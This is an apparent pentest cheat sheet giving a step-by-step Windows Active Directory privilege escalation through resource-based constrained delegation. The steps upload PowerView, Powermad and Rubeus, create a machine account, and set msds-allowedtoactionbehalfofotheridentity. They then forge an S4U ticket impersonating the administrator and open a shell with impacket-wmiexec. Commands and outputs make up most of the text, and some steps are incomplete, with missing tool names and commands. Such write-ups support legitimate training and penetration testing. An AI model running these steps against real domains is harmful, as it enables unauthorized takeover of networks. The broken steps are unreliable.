Windows PrivEsc with Kerberos

Last modified: 2023-10-22

Active Directory Privilege Escalation Windows

Privilege Escalation

First off, download two PS scripts in local machine..


Then upload them to the target machine.

# Evil-WinRM
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1

1. Check User's Permission and Windows Versions

Check if users are allowed to create a new computer object on the domain.

Get-DomainObject -Identity "dc=example,dc=com" -Domain

# -------------------------
# Result
ms-ds-machineaccountquota: 10

And check if the machine is at least Windows Server 2012.


# -------------------------
# Result
OSVersion: Windows Server 2022 Standard

Additionally, check if the target computer does not have the attributes “msds-allowedtoactionbehalfofotheridentity” set.

Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactionbehalfofotheridentity

# ------------------
# Result
name msds-allowedtoactionbehalfofotheridentity
---- ----------------------------------------
<HOSTNAME>   {1, 0, 4, 128...}

2. Create a New Computer

Now you can create a new computer object.

New-MachineAccount -MachineAccount TEST01 -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
Get-DomainComputer test01

# ----------------------
# Result (copy the id)
objectsid: S-1-5-21-1677581083-3380853377-188903654-5103

Create a new raw security descriptor.

# Paste the objectsid which was copied in previous section.
$objectsid = "S-1-5-21-1677581083-3380853377-188903654-5103"

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$objectsid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer $(hostname) | Set-DomainObject -Set @{'msds-allowedtoactionbehalfofotheridentity'=$SDBytes} -Verbose

3. Impersonate to Get a Ticket

Download Rubeus.exe in local machine.


Then upload it to the target machine and generate a RC4 hash.

# Evil-WinRM
upload Rubeus.exe
.\Rubeus.exe hash /password:12345 /user:test01 /

# -------------------------
# Result (copy the rc4 hash)
rc4_hmac: 32ED87BDB5FDC5E9CBA88547376818D4

We can request a Kerberos ticket for a new machine account while impersonating an administrator.

.\Rubeus.exe s4u /user:test01$ /rc4:<rc4-hash> /impersonateuser:administrator /msdsspn:cifs/<hostname> /ptt

# --------------
# Result (copy the output long hash at the last)

Then generate a ticket (.kirbi).

[IO.File]::WriteAllBytes("C:\Users\<username>\Documents\ticket.kirbi", [Convert]::FromBase64String("<new-output-hash>"))
download ticket.kirbi

4. Make the Ticket Usable and Use It

Download “”.


Destroy any tickets in local machine, and convert the ticket to Linux usable, then set the new ticket’s path.

python3 ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache

We can use the ticket to get a shell.

impacket-wmiexec<hostname> -no-pass -k